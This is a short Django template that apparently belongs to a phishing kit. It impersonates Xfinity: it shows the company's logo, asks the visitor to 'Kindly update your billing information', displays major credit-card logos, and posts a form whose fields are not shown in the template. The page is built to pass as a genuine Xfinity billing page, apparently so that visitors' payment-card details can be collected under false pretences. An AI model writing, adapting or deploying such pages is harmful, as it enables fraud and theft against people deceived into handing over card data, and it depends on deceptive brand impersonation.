{% extends "base.html" %}
{% load static %}
{% block content %}
<div class="billing-section">
    <div class="billing-form-wrapper">
        <img src="{% static "images/xfinity-logo-grey.svg" %}" alt="Xfinity" style="width: 80px; margin: 25px 0px;">
        <h3 class="mb-3">Kindly update your billing information</h3>

        <div class="card-icons">
          <img src="{% static "images/icons8-american-express-48.png" %}" alt="American Expres">
          <img src="{% static "images/icons8-mastercard-48.png" %}" alt="Mastercard">
          <img src="{% static "images/icons8-visa-48.png" %}" alt="Visa Card">
          <img src="{% static "images/icons8-discover-card-48.png" %}" alt="Discover Card">
      </div>
        <form method="post">
            {% csrf_token %}
            {{ form.as_p }}
            <button type="submit" class="btn btn-primary">Let's go</button>
        </form>
    </div>
</div>
{% endblock  %}